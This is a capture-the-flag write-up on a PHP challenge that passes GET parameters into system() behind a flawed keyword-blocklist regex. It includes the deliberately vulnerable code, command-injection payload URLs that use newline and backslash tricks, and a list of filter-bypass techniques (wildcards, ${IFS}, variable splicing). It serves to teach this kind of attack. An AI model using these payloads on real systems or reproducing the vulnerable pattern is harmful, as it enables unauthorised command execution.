0x01 The code
<?php
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
// try bypass it
// note: both patterns are double-quoted PHP strings, so "\\" reaches PCRE as a single "\"
if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $a))
    $a = "";
$a = '"' . $a . '"';
if (preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $b))
    $b = "";
$b = '"' . $b . '"';
$cmd = "file $a $b";
str_replace(" ","","$cmd"); // return value is discarded, so $cmd keeps its spaces
system($cmd);
?>
0x02 Analysis
The first filter blocks cat, more, flag and other keywords. A backslash can be used to get past it, for example c\at fla\g.php (the reason is probably that the challenge's preg_match writes the backslash as \\, which ends up being equivalent to not filtering \ at all). We also know that on Linux a newline can serve as a command separator.

This is a small PHP regex pitfall: the two backslashes written in the PHP source become a single backslash, and that single backslash is then handed to the regex, where it escapes the character that follows it. Because of this flaw, what gets filtered in a is |* rather than *, and what gets filtered in b is |\n rather than \n.
payload: http://127.0.0.1/?a=\&b=%0Aca\t%20index.php%0A
var_dump of $cmd gives the following (the string contains line breaks in the middle):
string(27) "file "\" "
ca\t index.php
""
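As an added example, not code from the writeup or the challenge itself, the PHP below makes the escaping pitfall from 0x02 visible: the challenge's fragments \\|\* and \\|\n are rebuilt in a double-quoted string, as in the challenge, and beside them in a single-quoted string, where the backslashes reach PCRE intact; the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's own code.
// PHP double-quoted strings turn "\\" into a single backslash before the
// pattern reaches PCRE, so the fragment  \\|\*  becomes  \|\*  : one
// alternative matching the two-character sequence "|*" instead of two
// alternatives matching "\" and "*" on their own.
$fragA_as_written = "/\\|\*/";    // PCRE sees: /\|\*/
$fragB_as_written = "/\\|\n/";    // PCRE sees: /\|<newline>/

// Single quotes only process \\ and \', so four backslashes reach PCRE as
// two, i.e. a literal backslash alternative, and \* and \n stay as written.
$fragA_fixed = '/\\\\|\*/';       // PCRE sees: /\\|\*/
$fragB_fixed = '/\\\\|\n/';       // PCRE sees: /\\|\n/  (\n is PCRE's own newline escape)

// Returns true when the pattern would reject this input.
function blocked(string $pattern, string $input): bool
{
    return preg_match($pattern, $input) === 1;
}

// Constructed inputs: the lone characters the filter was meant to stop,
// the pair it actually stops, a bare newline, and the writeup's c\at trick.
$inputs = ['*', '\\', '|*', "\n", 'c\\at'];
foreach ($inputs as $in) {
    printf("%-8s a:written=%d fixed=%d   b:written=%d fixed=%d\n",
        json_encode($in),
        blocked($fragA_as_written, $in), blocked($fragA_fixed, $in),
        blocked($fragB_as_written, $in), blocked($fragB_fixed, $in));
}

// Even a correctly escaped pattern is still only a blocklist; the robust fix
// is to never pass $_GET values into system() and to wrap anything that must
// become a shell argument with escapeshellarg().
```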
0x03 Knowledge summary
1. Adding \ inside a command bypasses keyword filters.
2. Slicing an environment variable, e.g. ${path:0:1}, can also be used to bypass a filter, but here {} is filtered, so that method cannot be used; the env command lists all environment variables.
3. Two further ways to circumvent command filters: the Linux wildcard ?, e.g. writing var as v?r; and ${IFS} in place of spaces, e.g. expr${IFS}substr${IFS}"this is a test"${IFS}3${IFS}5
4. Commands can also be assembled by variable splicing, a=1;b=s;$a$b, with the semicolons replaced by %0A newlines: http://127.0.0.1/?a=\&b=%0Ac=ca%0Ad=t%0A$c$d index.php%0A
5. Different systems use different line endings:
- On Unix, each line ends only with <line feed>, i.e. \n (%0A)
- On Windows, each line ends with <carriage return><line feed>, i.e. \r\n
- On the Mac, each line ends with <carriage return>, i.e. \r (%0D)